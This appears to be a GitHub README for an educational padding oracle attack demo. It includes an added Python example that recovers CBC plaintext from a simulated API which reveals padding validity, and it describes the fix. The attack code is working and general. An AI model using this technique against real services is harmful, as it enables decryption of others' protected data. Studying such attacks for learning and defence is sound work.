davimoreno/padding_oracle_example

Simple Python implementation of a padding oracle attack on a vulnerable API
Padding Oracle Example

This repository contains a simple example of a padding oracle attack on a vulnerable API.

Code

  • vulnerable_api.py: simulates an API that is vulnerable to a padding oracle attack.
  • padding_oracle.py: performs a padding oracle attack against the vulnerable API.

Attack Scenario

  • The attacker has access to a valid payload (IV + encrypted blocks).
  • The attacker can use a request function that simulates interaction with a vulnerable API. Specifically, the function returns True if a given payload can be decrypted and False otherwise.
  • The encryption algorithm used by the API is vulnerable to a padding oracle attack. In this case, the API uses AES in CBC mode with PKCS7 padding.
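The scenario above, worked through as an added example that is not the repository's own code: a toy keyed 16-byte block cipher (a Feistel network over SHA-256) stands in for AES, since the attack relies only on CBC chaining and PKCS7 padding and never looks inside the block cipher; a simulated API answers only whether a payload decrypted; and recover_block learns one plaintext block from the previous ciphertext block and the target block, including the check that tells a real 01 padding apart from an accidental 02 02. All key, IV and message values are constructed for the example.

```python
import hashlib
BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _feistel(key, b, rounds):
    # Toy keyed 16-byte permutation (4-round Feistel over SHA-256) standing in for AES.
    l, r = b[:8], b[8:]
    for i in rounds:
        l, r = r, _xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return l + r

def dec_block(key, b):  # inverse of _feistel(key, b, range(4)), the encrypt direction
    out = _feistel(key, b[8:] + b[:8], range(3, -1, -1))
    return out[8:] + out[:8]

def cbc_encrypt(key, iv, pt):
    pt += bytes([BLOCK - len(pt) % BLOCK]) * (BLOCK - len(pt) % BLOCK)  # PKCS7
    out = [iv]
    for i in range(0, len(pt), BLOCK):
        out.append(_feistel(key, _xor(pt[i:i + BLOCK], out[-1]), range(4)))
    return b"".join(out)  # payload = IV + encrypted blocks, as in the README

def cbc_decrypt(key, payload):
    blocks = [payload[i:i + BLOCK] for i in range(0, len(payload), BLOCK)]
    pt = b"".join(_xor(dec_block(key, c), p) for p, c in zip(blocks, blocks[1:]))
    n = pt[-1]
    if not 1 <= n <= BLOCK or pt[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the one bit of information the API leaks
    return pt[:-n]

def oracle(key, payload):  # the vulnerable API: True if the payload decrypts, else False
    try:
        cbc_decrypt(key, payload)
        return True
    except ValueError:
        return False

def recover_block(ask, prev, target):  # ask(payload) -> bool is the attacker's only capability
    inter = bytearray(BLOCK)  # D_K(target), learned one byte at a time from the right
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(inter[j] ^ pad if j > pos else 0 for j in range(BLOCK))
        for guess in range(256):
            forged[pos] = guess
            # a last-byte hit may be a longer padding (e.g. 02 02): only a real 01 survives a change to byte 14
            if ask(bytes(forged) + target) and (pad > 1 or ask(bytes(14) + bytes([0xFF, guess]) + target)):
                inter[pos] = guess ^ pad
                break
    return _xor(inter, prev)  # plaintext block = D_K(target) XOR previous block, padding included
```

The fix on the API side is to authenticate the ciphertext before decrypting (or use an AEAD mode) and to return one identical error for every failure, so the answer no longer depends on the padding.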

Usage

To run the example, cd into the cloned repository and execute:

python3 padding_oracle.py

Note

I wrote this code to better understand the algorithm behind padding oracle attacks. It is not optimized, but it is useful for learning. If you want to test a padding oracle attack against an application (with permission, of course), consider using other tools like padre.
